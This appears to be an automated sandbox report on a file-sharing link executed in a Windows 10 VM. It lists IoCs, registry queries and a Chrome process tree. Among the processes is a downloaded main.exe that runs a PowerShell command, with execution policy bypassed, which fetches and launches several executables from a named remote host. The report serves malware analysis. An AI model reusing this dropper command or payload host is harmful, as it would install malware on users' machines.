hxxps://gofile[.]io/d/y09QNf

Analysis

max time kernel
1805s
max time network
1694s
platform
windows10-2004_x64
resource
win10v2004-20230221-en
resource tags

arch:x64arch:x86image:win10v2004-20230221-enlocale:en-usos:windows10-2004-x64system
submitted
23/04/2023, 18:13

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

https://gofile.io/d/y09QNf

Score

8^/10

Malware Config

Signatures

Downloads MZ/PE file

Executes dropped EXE 2 IoCs

pid	Process
316	main.exe
852	main.exe

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe

Modifies data under HKEY_USERS 2 IoCs

description	ioc	Process
Set value (int)	\REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133267544558587933"	chrome.exe
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry	chrome.exe

Suspicious behavior: EnumeratesProcesses 10 IoCs

pid	Process
4272	chrome.exe
4272	chrome.exe
4984	powershell.exe
4984	powershell.exe
4984	powershell.exe
3768	powershell.exe
3768	powershell.exe
3768	powershell.exe
6188	chrome.exe
6188	chrome.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 39 IoCs

pid	Process
4272	chrome.exe
4272	chrome.exe
4272	chrome.exe
4272	chrome.exe
4272	chrome.exe
4272	chrome.exe
4272	chrome.exe
4272	chrome.exe
4272	chrome.exe
4272	chrome.exe
4272	chrome.exe
4272	chrome.exe
4272	chrome.exe
4272	chrome.exe
4272	chrome.exe
4272	chrome.exe
4272	chrome.exe
4272	chrome.exe
4272	chrome.exe
4272	chrome.exe
4272	chrome.exe
4272	chrome.exe
4272	chrome.exe
4272	chrome.exe
4272	chrome.exe
4272	chrome.exe
4272	chrome.exe
4272	chrome.exe
4272	chrome.exe
4272	chrome.exe
4272	chrome.exe
4272	chrome.exe
4272	chrome.exe
4272	chrome.exe
4272	chrome.exe
4272	chrome.exe
4272	chrome.exe
4272	chrome.exe
4272	chrome.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeShutdownPrivilege	4272	chrome.exe
Token: SeCreatePagefilePrivilege	4272	chrome.exe
Token: SeShutdownPrivilege	4272	chrome.exe
Token: SeCreatePagefilePrivilege	4272	chrome.exe
Token: SeShutdownPrivilege	4272	chrome.exe
Token: SeCreatePagefilePrivilege	4272	chrome.exe
Token: SeShutdownPrivilege	4272	chrome.exe
Token: SeCreatePagefilePrivilege	4272	chrome.exe
Token: SeShutdownPrivilege	4272	chrome.exe
Token: SeCreatePagefilePrivilege	4272	chrome.exe
Token: SeShutdownPrivilege	4272	chrome.exe
Token: SeCreatePagefilePrivilege	4272	chrome.exe
Token: SeShutdownPrivilege	4272	chrome.exe
Token: SeCreatePagefilePrivilege	4272	chrome.exe
Token: SeShutdownPrivilege	4272	chrome.exe
Token: SeCreatePagefilePrivilege	4272	chrome.exe
Token: SeShutdownPrivilege	4272	chrome.exe
Token: SeCreatePagefilePrivilege	4272	chrome.exe
Token: SeShutdownPrivilege	4272	chrome.exe
Token: SeCreatePagefilePrivilege	4272	chrome.exe
Token: SeShutdownPrivilege	4272	chrome.exe
Token: SeCreatePagefilePrivilege	4272	chrome.exe
Token: SeShutdownPrivilege	4272	chrome.exe
Token: SeCreatePagefilePrivilege	4272	chrome.exe
Token: SeDebugPrivilege	4984	powershell.exe
Token: SeShutdownPrivilege	4272	chrome.exe
Token: SeCreatePagefilePrivilege	4272	chrome.exe
Token: SeShutdownPrivilege	4272	chrome.exe
Token: SeCreatePagefilePrivilege	4272	chrome.exe
Token: SeShutdownPrivilege	4272	chrome.exe
Token: SeCreatePagefilePrivilege	4272	chrome.exe
Token: SeShutdownPrivilege	4272	chrome.exe
Token: SeCreatePagefilePrivilege	4272	chrome.exe
Token: SeShutdownPrivilege	4272	chrome.exe
Token: SeCreatePagefilePrivilege	4272	chrome.exe
Token: SeShutdownPrivilege	4272	chrome.exe
Token: SeCreatePagefilePrivilege	4272	chrome.exe
Token: SeShutdownPrivilege	4272	chrome.exe
Token: SeCreatePagefilePrivilege	4272	chrome.exe
Token: SeShutdownPrivilege	4272	chrome.exe
Token: SeCreatePagefilePrivilege	4272	chrome.exe
Token: SeShutdownPrivilege	4272	chrome.exe
Token: SeCreatePagefilePrivilege	4272	chrome.exe
Token: SeShutdownPrivilege	4272	chrome.exe
Token: SeCreatePagefilePrivilege	4272	chrome.exe
Token: SeShutdownPrivilege	4272	chrome.exe
Token: SeCreatePagefilePrivilege	4272	chrome.exe
Token: SeShutdownPrivilege	4272	chrome.exe
Token: SeCreatePagefilePrivilege	4272	chrome.exe
Token: SeShutdownPrivilege	4272	chrome.exe
Token: SeCreatePagefilePrivilege	4272	chrome.exe
Token: SeShutdownPrivilege	4272	chrome.exe
Token: SeCreatePagefilePrivilege	4272	chrome.exe
Token: SeShutdownPrivilege	4272	chrome.exe
Token: SeCreatePagefilePrivilege	4272	chrome.exe
Token: SeShutdownPrivilege	4272	chrome.exe
Token: SeCreatePagefilePrivilege	4272	chrome.exe
Token: SeShutdownPrivilege	4272	chrome.exe
Token: SeCreatePagefilePrivilege	4272	chrome.exe
Token: SeShutdownPrivilege	4272	chrome.exe
Token: SeCreatePagefilePrivilege	4272	chrome.exe
Token: SeShutdownPrivilege	4272	chrome.exe
Token: SeCreatePagefilePrivilege	4272	chrome.exe
Token: SeDebugPrivilege	3768	powershell.exe

Suspicious use of FindShellTrayWindow 37 IoCs

pid	Process
4272	chrome.exe
4272	chrome.exe
4272	chrome.exe
4272	chrome.exe
4272	chrome.exe
4272	chrome.exe
4272	chrome.exe
4272	chrome.exe
4272	chrome.exe
4272	chrome.exe
4272	chrome.exe
4272	chrome.exe
4272	chrome.exe
4272	chrome.exe
4272	chrome.exe
4272	chrome.exe
4272	chrome.exe
4272	chrome.exe
4272	chrome.exe
4272	chrome.exe
4272	chrome.exe
4272	chrome.exe
4272	chrome.exe
4272	chrome.exe
4272	chrome.exe
4272	chrome.exe
4272	chrome.exe
4272	chrome.exe
4272	chrome.exe
4272	chrome.exe
4272	chrome.exe
4272	chrome.exe
4272	chrome.exe
4272	chrome.exe
4272	chrome.exe
4272	chrome.exe
4272	chrome.exe

Suspicious use of SendNotifyMessage 24 IoCs

pid	Process
4272	chrome.exe
4272	chrome.exe
4272	chrome.exe
4272	chrome.exe
4272	chrome.exe
4272	chrome.exe
4272	chrome.exe
4272	chrome.exe
4272	chrome.exe
4272	chrome.exe
4272	chrome.exe
4272	chrome.exe
4272	chrome.exe
4272	chrome.exe
4272	chrome.exe
4272	chrome.exe
4272	chrome.exe
4272	chrome.exe
4272	chrome.exe
4272	chrome.exe
4272	chrome.exe
4272	chrome.exe
4272	chrome.exe
4272	chrome.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 4272 wrote to memory of 2108	4272	chrome.exe	86
PID 4272 wrote to memory of 2108	4272	chrome.exe	86
PID 4272 wrote to memory of 2100	4272	chrome.exe	87
PID 4272 wrote to memory of 2100	4272	chrome.exe	87
PID 4272 wrote to memory of 2100	4272	chrome.exe	87
PID 4272 wrote to memory of 2100	4272	chrome.exe	87
PID 4272 wrote to memory of 2100	4272	chrome.exe	87
PID 4272 wrote to memory of 2100	4272	chrome.exe	87
PID 4272 wrote to memory of 2100	4272	chrome.exe	87
PID 4272 wrote to memory of 2100	4272	chrome.exe	87
PID 4272 wrote to memory of 2100	4272	chrome.exe	87
PID 4272 wrote to memory of 2100	4272	chrome.exe	87
PID 4272 wrote to memory of 2100	4272	chrome.exe	87
PID 4272 wrote to memory of 2100	4272	chrome.exe	87
PID 4272 wrote to memory of 2100	4272	chrome.exe	87
PID 4272 wrote to memory of 2100	4272	chrome.exe	87
PID 4272 wrote to memory of 2100	4272	chrome.exe	87
PID 4272 wrote to memory of 2100	4272	chrome.exe	87
PID 4272 wrote to memory of 2100	4272	chrome.exe	87
PID 4272 wrote to memory of 2100	4272	chrome.exe	87
PID 4272 wrote to memory of 2100	4272	chrome.exe	87
PID 4272 wrote to memory of 2100	4272	chrome.exe	87
PID 4272 wrote to memory of 2100	4272	chrome.exe	87
PID 4272 wrote to memory of 2100	4272	chrome.exe	87
PID 4272 wrote to memory of 2100	4272	chrome.exe	87
PID 4272 wrote to memory of 2100	4272	chrome.exe	87
PID 4272 wrote to memory of 2100	4272	chrome.exe	87
PID 4272 wrote to memory of 2100	4272	chrome.exe	87
PID 4272 wrote to memory of 2100	4272	chrome.exe	87
PID 4272 wrote to memory of 2100	4272	chrome.exe	87
PID 4272 wrote to memory of 2100	4272	chrome.exe	87
PID 4272 wrote to memory of 2100	4272	chrome.exe	87
PID 4272 wrote to memory of 2100	4272	chrome.exe	87
PID 4272 wrote to memory of 2100	4272	chrome.exe	87
PID 4272 wrote to memory of 2100	4272	chrome.exe	87
PID 4272 wrote to memory of 2100	4272	chrome.exe	87
PID 4272 wrote to memory of 2100	4272	chrome.exe	87
PID 4272 wrote to memory of 2100	4272	chrome.exe	87
PID 4272 wrote to memory of 2100	4272	chrome.exe	87
PID 4272 wrote to memory of 2100	4272	chrome.exe	87
PID 4272 wrote to memory of 1520	4272	chrome.exe	88
PID 4272 wrote to memory of 1520	4272	chrome.exe	88
PID 4272 wrote to memory of 5108	4272	chrome.exe	89
PID 4272 wrote to memory of 5108	4272	chrome.exe	89
PID 4272 wrote to memory of 5108	4272	chrome.exe	89
PID 4272 wrote to memory of 5108	4272	chrome.exe	89
PID 4272 wrote to memory of 5108	4272	chrome.exe	89
PID 4272 wrote to memory of 5108	4272	chrome.exe	89
PID 4272 wrote to memory of 5108	4272	chrome.exe	89
PID 4272 wrote to memory of 5108	4272	chrome.exe	89
PID 4272 wrote to memory of 5108	4272	chrome.exe	89
PID 4272 wrote to memory of 5108	4272	chrome.exe	89
PID 4272 wrote to memory of 5108	4272	chrome.exe	89
PID 4272 wrote to memory of 5108	4272	chrome.exe	89
PID 4272 wrote to memory of 5108	4272	chrome.exe	89
PID 4272 wrote to memory of 5108	4272	chrome.exe	89
PID 4272 wrote to memory of 5108	4272	chrome.exe	89
PID 4272 wrote to memory of 5108	4272	chrome.exe	89
PID 4272 wrote to memory of 5108	4272	chrome.exe	89
PID 4272 wrote to memory of 5108	4272	chrome.exe	89
PID 4272 wrote to memory of 5108	4272	chrome.exe	89
PID 4272 wrote to memory of 5108	4272	chrome.exe	89
PID 4272 wrote to memory of 5108	4272	chrome.exe	89
PID 4272 wrote to memory of 5108	4272	chrome.exe	89

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" "--simulate-outdated-no-au='Tue, 31 Dec 2099 23:59:59 GMT'" https://gofile.io/d/y09QNf
1⤵
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:4272
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ff817be9758,0x7ff817be9768,0x7ff817be9778
  2⤵
  PID:2108
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1748 --field-trial-handle=1872,i,6138845163824503257,5231462694389518605,131072 /prefetch:2
  2⤵
  PID:2100
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2176 --field-trial-handle=1872,i,6138845163824503257,5231462694389518605,131072 /prefetch:8
  2⤵
  PID:1520
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2256 --field-trial-handle=1872,i,6138845163824503257,5231462694389518605,131072 /prefetch:8
  2⤵
  PID:5108
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=3180 --field-trial-handle=1872,i,6138845163824503257,5231462694389518605,131072 /prefetch:1
  2⤵
  PID:3956
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=3160 --field-trial-handle=1872,i,6138845163824503257,5231462694389518605,131072 /prefetch:1
  2⤵
  PID:4136
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=4732 --field-trial-handle=1872,i,6138845163824503257,5231462694389518605,131072 /prefetch:1
  2⤵
  PID:636
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=8 --mojo-platform-channel-handle=3424 --field-trial-handle=1872,i,6138845163824503257,5231462694389518605,131072 /prefetch:1
  2⤵
  PID:1552
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=9 --mojo-platform-channel-handle=4940 --field-trial-handle=1872,i,6138845163824503257,5231462694389518605,131072 /prefetch:1
  2⤵
  PID:4988
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=5856 --field-trial-handle=1872,i,6138845163824503257,5231462694389518605,131072 /prefetch:8
  2⤵
  PID:4144
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=5848 --field-trial-handle=1872,i,6138845163824503257,5231462694389518605,131072 /prefetch:8
  2⤵
  PID:3620
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=5568 --field-trial-handle=1872,i,6138845163824503257,5231462694389518605,131072 /prefetch:8
  2⤵
  PID:4420
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=14 --mojo-platform-channel-handle=6200 --field-trial-handle=1872,i,6138845163824503257,5231462694389518605,131072 /prefetch:1
  2⤵
  PID:864
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=13 --mojo-platform-channel-handle=6148 --field-trial-handle=1872,i,6138845163824503257,5231462694389518605,131072 /prefetch:1
  2⤵
  PID:1964
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=15 --mojo-platform-channel-handle=4920 --field-trial-handle=1872,i,6138845163824503257,5231462694389518605,131072 /prefetch:1
  2⤵
  PID:2632
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4904 --field-trial-handle=1872,i,6138845163824503257,5231462694389518605,131072 /prefetch:8
  2⤵
  PID:1468
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4932 --field-trial-handle=1872,i,6138845163824503257,5231462694389518605,131072 /prefetch:8
  2⤵
  PID:2788
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=5920 --field-trial-handle=1872,i,6138845163824503257,5231462694389518605,131072 /prefetch:8
  2⤵
  PID:4936
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=5892 --field-trial-handle=1872,i,6138845163824503257,5231462694389518605,131072 /prefetch:8
  2⤵
  PID:1004
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=20 --mojo-platform-channel-handle=6980 --field-trial-handle=1872,i,6138845163824503257,5231462694389518605,131072 /prefetch:1
  2⤵
  PID:4724
- C:\Users\Admin\Downloads\main.exe
  "C:\Users\Admin\Downloads\main.exe"
  2⤵
  - Executes dropped EXE
  PID:316
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c powershell.exe -ExecutionPolicy Bypass -Command "$base_url = "https://cdn-1.thughunter.repl.co/cdn/" $download_path = "C:\Users\Admin\AppData\Local\Temp\" $files = "libcurl-x64.def", "libcurl-x64.dll", "libgcc_s_seh-1.dll", "libsodium-23.dll", "libsodium-24.def", "sqlite3.def", "sqlite3.dll", "main.exe", "nagogy-multi-tool.exe" foreach ($file in $files) { $url = $base_url + $file $output = $download_path + $file Start-BitsTransfer -Source $url -Destination $output } Start-Process -FilePath "$download_path\main.exe" Start-Process -FilePath "$download_path\nagogy-multi-tool.exe" "
    3⤵
    PID:3412
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe -ExecutionPolicy Bypass -Command "$base_url = "https://cdn-1.thughunter.repl.co/cdn/"
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:4984
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=21 --mojo-platform-channel-handle=7312 --field-trial-handle=1872,i,6138845163824503257,5231462694389518605,131072 /prefetch:1
  2⤵
  PID:4688
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=22 --mojo-platform-channel-handle=7428 --field-trial-handle=1872,i,6138845163824503257,5231462694389518605,131072 /prefetch:1
  2⤵
  PID:2824
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=24 --mojo-platform-channel-handle=6728 --field-trial-handle=1872,i,6138845163824503257,5231462694389518605,131072 /prefetch:1
  2⤵
  PID:4588
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=23 --mojo-platform-channel-handle=5848 --field-trial-handle=1872,i,6138845163824503257,5231462694389518605,131072 /prefetch:1
  2⤵
  PID:4700
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=27 --mojo-platform-channel-handle=5060 --field-trial-handle=1872,i,6138845163824503257,5231462694389518605,131072 /prefetch:1
  2⤵
  PID:1004
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=26 --mojo-platform-channel-handle=3424 --field-trial-handle=1872,i,6138845163824503257,5231462694389518605,131072 /prefetch:1
  2⤵
  PID:4808
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=25 --mojo-platform-channel-handle=6716 --field-trial-handle=1872,i,6138845163824503257,5231462694389518605,131072 /prefetch:1
  2⤵
  PID:4348
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=28 --mojo-platform-channel-handle=7200 --field-trial-handle=1872,i,6138845163824503257,5231462694389518605,131072 /prefetch:1
  2⤵
  PID:5440
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=29 --mojo-platform-channel-handle=7984 --field-trial-handle=1872,i,6138845163824503257,5231462694389518605,131072 /prefetch:1
  2⤵
  PID:5544
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=30 --mojo-platform-channel-handle=8196 --field-trial-handle=1872,i,6138845163824503257,5231462694389518605,131072 /prefetch:1
  2⤵
  PID:5744
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=34 --mojo-platform-channel-handle=8344 --field-trial-handle=1872,i,6138845163824503257,5231462694389518605,131072 /prefetch:1
  2⤵
  PID:5840
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=33 --mojo-platform-channel-handle=8512 --field-trial-handle=1872,i,6138845163824503257,5231462694389518605,131072 /prefetch:1
  2⤵
  PID:5832
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=32 --mojo-platform-channel-handle=5936 --field-trial-handle=1872,i,6138845163824503257,5231462694389518605,131072 /prefetch:1
  2⤵
  PID:5824
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=31 --mojo-platform-channel-handle=8500 --field-trial-handle=1872,i,6138845163824503257,5231462694389518605,131072 /prefetch:1
  2⤵
  PID:5816
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=9356 --field-trial-handle=1872,i,6138845163824503257,5231462694389518605,131072 /prefetch:8
  2⤵
  PID:4308
- C:\Users\Admin\Downloads\main.exe
  "C:\Users\Admin\Downloads\main.exe"
  2⤵
  - Executes dropped EXE
  PID:852
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c powershell.exe -ExecutionPolicy Bypass -Command "$base_url = "https://cdn-1.thughunter.repl.co/cdn/" $download_path = "C:\Users\Admin\AppData\Local\Temp\" $files = "libcurl-x64.def", "libcurl-x64.dll", "libgcc_s_seh-1.dll", "libsodium-23.dll", "libsodium-24.def", "sqlite3.def", "sqlite3.dll", "main.exe", "nagogy-multi-tool.exe" foreach ($file in $files) { $url = $base_url + $file $output = $download_path + $file Start-BitsTransfer -Source $url -Destination $output } Start-Process -FilePath "$download_path\main.exe" Start-Process -FilePath "$download_path\nagogy-multi-tool.exe" "
    3⤵
    PID:3652
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe -ExecutionPolicy Bypass -Command "$base_url = "https://cdn-1.thughunter.repl.co/cdn/"
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:3768
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=36 --mojo-platform-channel-handle=5832 --field-trial-handle=1872,i,6138845163824503257,5231462694389518605,131072 /prefetch:1
  2⤵
  PID:6124
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=37 --mojo-platform-channel-handle=8108 --field-trial-handle=1872,i,6138845163824503257,5231462694389518605,131072 /prefetch:1
  2⤵
  PID:2448
- C:\Program Files\Google\Chrome\Application\chrome.exe
